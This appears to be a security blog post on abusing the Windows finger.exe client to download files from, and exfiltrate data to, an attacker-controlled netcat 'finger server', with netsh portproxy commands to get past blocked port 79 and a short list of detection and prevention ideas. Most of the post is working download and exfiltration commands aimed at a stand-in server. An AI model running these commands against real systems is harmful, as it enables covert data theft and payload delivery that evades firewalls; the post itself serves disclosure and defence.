Using finger.exe to Transfer Files

finger.exe can be abused to transfer data to and from hosts. Finger is an old protocol which does not seem to get used much anymore. For reasons unknown to me, Windows supplies a finger client.

The Finger protocol is defined in RFC 1288.

Receiving data

First you will need to set up a makeshift finger server to serve a file. I did this with a sleazy while loop and netcat:

while [ 1 ]; do nc -q 0 -nlvp 79 < FILENAME_GOES_HERE; done

Next, on Windows, you can download this with finger.exe in PowerShell

 finger @YOUR_FINGER_SERVER|Select -Skip 2 > outfile.txt

or cmd.exe

finger @YOUR_FINGER_SERVER |more +2 >out.txt                           

This could easily use this technique to serve code to pipe into cmd.exe or PowerShell.

Sending Data

Specifying a user with finger.exe allows you to exfiltrate data several bytes at a time. In my tests on Windows 10, I was able to send a little over 8000 bytes at a time.

Writing a script to chunk and encode a file, and send it to a server would not be too hard to do. Here is a quick proof of concept:

On the server:

touch empty
while [ 1 ]; do nc -q 0 -nlvp 79 < empty >> outfile

From Windows host:

finger "a string here"@YOUR_FINGER_SERVER
finger lotsofbyteshere@YOUR_FINGER_SERVER
finger part1000of1000@YOUR_FINGER_SERVER

After you are done sending data, hit Control-C to kill the netcat listener loop, and outfile will contain everything received during the duration of the loop running.

DarkFinger-C2 is a more polished example of this technique, which I discovered while writing this post.

Dealing with Firewalls

finger utilizes port 79 which may be blocked. You can get around this with netsh portproxy and changing the port your finger server listens on. In this example, we have changed it to 8080

netsh interface portproxy add v4tov4 listenaddress= listenport=79 connectaddress=YOUR_FINGER_SERVER_IP connectport=8080

netsh interface portproxy add v4tov4 listenaddress= listenport=8080 connectaddress= connectport=79

Now, you can finger localhost and the traffic is relayed to your server on port 8080:

finger "exfil data here"@

When you are done, remove the netsh rules:

netsh interface portproxy delete v4tov4 listenport=79 listenaddress=
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=

Detection and Prevention

Here are some ideas of how to detect and prevent this technique:

  • Restrict traffic for TCP port 79.
  • Monitor for use of finger.exe.
  • Presence of C:\Windows\Prefetch\finger*.pf indicates that finger.exe has executed on a host.
  • Set restrictive permissions to execute finger.exe or consider removing it if you are not using it.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s